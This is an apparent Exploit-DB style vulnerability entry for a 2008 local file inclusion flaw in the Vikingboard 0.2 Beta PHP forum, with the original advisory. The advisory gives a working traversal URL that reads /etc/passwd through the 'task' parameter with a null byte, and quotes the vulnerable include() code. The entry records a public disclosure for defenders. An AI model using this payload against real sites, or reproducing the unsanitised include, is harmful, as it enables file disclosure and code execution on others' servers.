header-logo
Suggest Exploit
vendor:
Vikingboard
by:
dun
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Vikingboard
Affected Version From: 0.2 Beta
Affected Version To: 0.2 Beta
Patch Exists: YES
Related CWE: N/A
CPE: a:vikingboard:vikingboard
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Vikingboard <= 0.2 Beta Local File Inclusion Vulnerability

Vikingboard is a PHP-based discussion forum. A vulnerability exists in Vikingboard 0.2 Beta which allows attackers to include arbitrary local files via the 'task' parameter in the 'index.php' script. This can be exploited to disclose sensitive information or to execute arbitrary PHP code.

Mitigation:

Upgrade to the latest version of Vikingboard.
Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #######################################################################
 #  [ Vikingboard <= 0.2 Beta ]   Local File Inclusion Vulnerability   #
 #######################################################################
 #
 # Script: "Vikingboard is a PHP-based discussion forum..."
 #
 # Script site: http://vikingboard.com/
 # Download: http://sourceforge.net/projects/vboard/
 #
 # Vuln: 
 # http://site.com/[Vikingboard_0.2_Beta]/upload/index.php?act=task&task=./../../../../../../../etc/passwd%00
 #
 #
 # Bug: ./Vikingboard_0.2_Beta/upload/index.php (lines: 81-91)
 #
 # ...
 # 81:		switch(ifsetor($_GET['act'], false))
 # 82:		{
 #		 ...
 # 88:		 case 'task':
 # 89:		 require('./inc/lib/task_loader.php');				// (1)
 # 90:		 load_task();							// (2)	
 # 91:		 break;
 # ... 			    
 #
 #
 # Bug: ./Vikingboard_0.2_Beta/upload/inc/lib/task_loader.php (lines: 19-44)
 #
 # ...
 # 19: 		function load_task()
 # 20: 		{
 #		   ...
 # 27:		   if (!include("inc/tasks/task_{$_GET['task']}.php"))  	// (3) LFI
 # 28:		   {
 # 29:		      //	Stop the script if the task does not exist
 # 30:		      die();
 # 31:		   }
 #		....
 # 44:		}
 # ... 			    
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-25]